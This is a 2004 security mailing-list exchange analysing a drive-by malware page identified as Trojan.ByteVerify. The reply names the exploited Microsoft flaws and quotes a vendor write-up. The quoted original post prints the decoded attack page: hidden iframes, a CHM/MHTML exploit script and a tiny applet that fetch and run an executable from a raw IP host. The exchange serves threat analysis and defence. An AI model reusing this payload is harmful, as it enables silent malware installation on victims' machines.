Re: Strange Java Loader (not so strange - Trojan.ByteVerify)
In-Reply-To: <116798078.20041230073423@xxxxxxx>
>so far, anyone knows how to protect from this crap?
Update your Windows and your antivirus software !
this attack is known as "Trojan.ByteVerify". It exploits the "Internet
Explorer/Outlook CHM File Processing Arbitrary Code Execution Vulnerability
(MS04-013)" and the "Microsoft virtual machine Remote Code execution flaw
(MS03-011)".
<Symantec>
When Trojan.ByteVerify is executed, it performs the following actions:
Escapes the sandbox restrictions, using Blackbox.class, by doing the following:
Declares a new PermissionDataSet with setFullyTrusted set to TRUE.
Creates a trusted PermissionSet.
Sets permission to PermissionSet by creating its own URLClassLoader class,
derived from the VerifierBug.class.
Loads Beyond.class using the URLClassLoader from Blackbox.class.
Gains unrestricted rights on the local machine by invoking the
.assertPermission method of the PolicyEngine class in Beyond.class.
[...]
May attempt to retrieve dialer programs and install them on the infected
computer. The dialer programs may attempt to connect the infected computer to
pornographic Web sites.
Threat Known As :
Exploit-ByteVerify [McAfee]
Trojan.ByteVerify [Symantec]
Exploit.Java.Bytverify [KAV]
JAVA_BYTVERIFY.A [Trend]
Regards
K-OTik Security Research & Monitoring Team 24/7
http://www.k-otik.com
>
>Hi People,
>
>before reading this,
>dont go on any of the sites
>unless you are sure ;)
>
>after decrypting some stuff, this is the source from:
>http://xxl-size.com/cogo.html
>-------------------------------------
><iframe src="http://209.8.20.130/dl/adv346.php">
><iframe src="http://www.awmcash.biz/adverts/14/1.htm">
>-------------------------------------
>
>this is the source from one of the iframes
>(http://209.8.20.130/dl/adv346.php):
>----------------------------------------------------
><html><head>
></head><body>
><textarea id="cxw" style="display:none;">
> <object data="${PR}" type="text/x-scriptlet"></object>
></textarea>
>
><script language="javascript">
>document.write(cxw.value.replace(/\${PR}/g,'ms-its:mhtml:file://c:\\nosuch.mht!http://209.8.20.130/dl/adv346/x.chm::/x.htm'));
></script>
><applet width=1 height=1 ARCHIVE=loaderadv346.jar
>code=Counter></APPLET></body></html>
>----------------------------------------------------
>
>the jar archive loaderadv346.jar contains some java classes
>which exploits the URLClassLoader bug (BlackBox.class).
>it overrides the sandbox and downloads a loadadv346.exe from:
>http://209.8.20.130/dl/loadadv346.exe
>
>this seems to be a dialer or something like this,
>it changes the hosts file, creates some spawn files,
>you can look for yourself, i included the file
>and the java stuff, the loadadv is upx'd,
>
>so far, anyone knows how to protect from this crap?
>you're welcome to send some solutions ;)
>
>cya, Stefan